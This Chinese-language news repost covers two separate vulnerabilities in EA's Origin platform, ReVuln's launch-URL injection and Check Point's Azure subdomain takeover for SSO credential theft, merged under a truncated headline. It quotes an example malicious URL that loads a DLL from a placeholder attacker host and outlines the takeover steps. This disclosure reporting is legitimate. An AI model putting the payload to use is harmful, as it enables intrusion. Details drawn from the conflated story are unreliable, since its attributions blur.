Origin游戏平台被记者暴光安全漏洞,漏洞致3亿账

名为ReVuln的计算机安全公司曾在去年曝光了Steam平台存在URL地址访问安全漏洞,现在该公司再次在阿姆斯特丹召开的Black Hat安全会议上指出EA的Origin平台同样具有类似的问题。

游戏平台存有太多敏感客户数据,渐成黑客眼中肥肉。

ReVuln公司的研究人员表示,在经过多次测试之后证明,Origin平台的URL验证机制存在漏洞,黑客可以利用这一漏洞推送假冒URL链接来向玩家计算机中安装恶意程序。

图片 1

通常来说,玩家在试图通过Origin启动游戏时,客户端会先向服务器请求一个用来启动游戏的URL地址,比如:origin://LaunchGame/[GameID],而如果该地址被黑客拦截并替换成包含有不良内容的加链接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那么一旦玩家执行启动游戏操作时便会导致自己的计算机遭遇安全风险。

EA Games 曝出漏洞,黑客可利用该漏洞劫持注册玩家账户,悄悄获取完全访问及控制权,或迫使玩家与黑客互动。受影响账户数达 3 亿。

不过,研究人员也表示,虽然Origin平台自身具有这样的安全机制缺陷,但黑客想要通过这种方式对用户发起攻击也并非易于反掌,因为目前大多浏览器产品都具有非法URL过滤拦截功能,所以为了确保计算机的安全,用户一定要保证打开相关的浏览器安全功能,并且安装有最新版的防病毒软件,同时拒绝访问那些不熟悉的URL地址。

以色列网络安全公司 CyberInt 和 Check Point 发现,他们可以操纵 EA Games 的域名注册方式,劫持微软 Azure 云中的子域名以完全接管玩家账户。

图片 2

EA Game 为美国艺电公司旗下最主要的品牌,盈利估值约 50 亿美元,开发、售卖、托管着游戏界耳熟能详的几大经典,比如运动类游戏《FIFA》、《疯狂橄榄球》、《NBA》和第一人称射击 游戏《战地》(Battlefield)、《荣誉勋章》(Medal of Honor) 等。《所有这些著名的游戏都通过 EA Games 的数字分发平台 Origin 发售。

Origin 游戏平台兼具社交功能,账户持有者可通过聊天应用或直接加入游戏会话与朋友联系。该平台还与 Facebook、Xbox Live、Play Station Network 和任天堂网络 (Nintendo Network) 等多个社交网站进行了社区集成。

研究人员发现的漏洞可使黑客通过逐级利用漏洞来最终获取用户的单点登录 凭证。

Check Point 向 EA Games 披露了该安全问题,并正在与之合作修复此漏洞。

艺电游戏与平台安全高级总监 Adrian Stone 在电子邮件声明中表示:

EA Games 平台采用多个不同域名运营其服务,比如 ea.com 和 origin.com,后者即为 EA 数字商店。两个域名都可登录 EA 账户。

EA Games 之类云服务会将子域名地址注册到特定云提供商的托管主机上,比如 eaplayinvite.ea.com 的 DNS 指针就指向主机列表 ea-invite-reg.azurewebsites.net ——当时正在后台运行该服务。

EA Games 采用微软 Azure 托管其包括 ea.com 和 origin.com 在内的多个域名,Azure 用户账户持有者可以申请注册特定服务名来关联域名与子域名。

CyberInt 在对 EA 平台的调查中发现,ea-invite-reg.azurewebsites.net 服务在 Azure 云服务中已不再使用,然而该特定子域名 eaplayinvite.ea.com 依然通过 CNAME 配置重定向到此服务。

eaplayinvite.ea.com 的 DNS 指针指向 CNAME 记录 ea-invite-reg.azurewebsites.net

于是,研究人员切实劫持了域名信息重定向,而 eaplayinvite.ea.com 域名被重定向到了他们的 Azure 云 Web 服务账户。

再通过一系列步骤,攫取 SSO 凭证并不是什么难事。Check Point 也确实这么做了。他们修改了某用户发向被劫持 EA 子域名的 HTTP 请求中 *returnURI* 参数。该公司在被劫持子域名索引页中插入了一个 Iframe 内联框架,让请求从该 Iframe 发起,以此绕过服务器 HTTP Referer 头验证。

Check Point 产品漏洞研究主管 Oded Vanunu 在电子邮件声明中评论道:EA 的 Origin 平台非常流行,如果不修复,这些漏洞可致数百万用户被黑客劫持利用。

本文由澳门皇冠844网站发布于网络游戏,转载请注明出处:Origin游戏平台被记者暴光安全漏洞,漏洞致3亿账

您可能还会对下面的文章感兴趣: